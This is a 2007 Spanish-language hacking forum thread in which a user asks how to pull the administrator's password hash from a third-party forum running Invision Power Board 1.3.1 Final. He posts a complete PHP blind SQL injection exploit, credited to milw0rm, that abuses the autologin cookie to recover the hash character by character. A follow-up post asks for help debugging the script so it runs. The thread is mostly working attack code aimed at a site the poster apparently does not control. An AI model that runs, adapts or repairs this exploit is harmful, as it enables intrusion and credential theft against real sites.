Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Diciembre 02, 2008, 02:40:32
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNSeCure)  |  Tema: Ayuda con acunetix 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Ayuda con acunetix  (Leído 144 veces)
Jack´s
Recien Llegado
*
Desconectado Desconectado

Mensajes: 3


Ver Perfil
« en: Febrero 20, 2007, 10:39:17 »
juegos gratis
Ahh le hice un scan a un foro q esta potenciado por Invision Power Board(U) v1.3.1 Final.. y quisiera mas o menos q me dijeran el tipo de vulnerabilidad q tenga un camino mas facil para poderle por lo menos sacarle el hash al admin..


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Y el exploit logico para este tipo de vulnerabilidades en forma de inyeccion es..

Citar
<?php
/*
<= 1.3.1 Final
/str0ke
*/

$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;

while( !($found) ) {
$letter = substr($hex, $idx, 1);

/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;

/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */

$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;

$hash .= $letter;
} else {
$idx++;
}
}
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);

if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";

fputs($fp, $com);

do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}

return $header;
}
?>

// milw0rm.com [2005-06-08]

Gracias Arkita q me ayudo.. ^^; y bueno.. pero al compilarlo con bamcompile.. me dice q fue compilado sastifactoriamente.. aunq creo.. q donde dice "index.php" va el link de la pagina.. y creo q tambien tengo q modificarle el cookie. .pero ahi es donde me tranco.. =S
En línea
Jack´s
Recien Llegado
*
Desconectado Desconectado

Mensajes: 3


Ver Perfil
« Respuesta #1 en: Febrero 20, 2007, 12:11:08 »
=S como asi? si con el bamcopile se puede hacer.. lo q falta es acomodar bien el exploit y mas nada.. solo q estoy probando con el PHP coder q tengo en
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion para ver q hace.. pero el error me da en la linea 57.. osea asi:

Citar
Warning: fsockopen() [function.fsockopen]: unable to connect to
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion (Unable to find the socket transport "http" - did you forget to enable it when you configured PHP?) in c:\wamp\www\explote.php on line 57

Y la linea 57 es..         

Citar
$fp = fsockopen($ip, $port);
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNSeCure)  |  Tema: Ayuda con acunetix « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC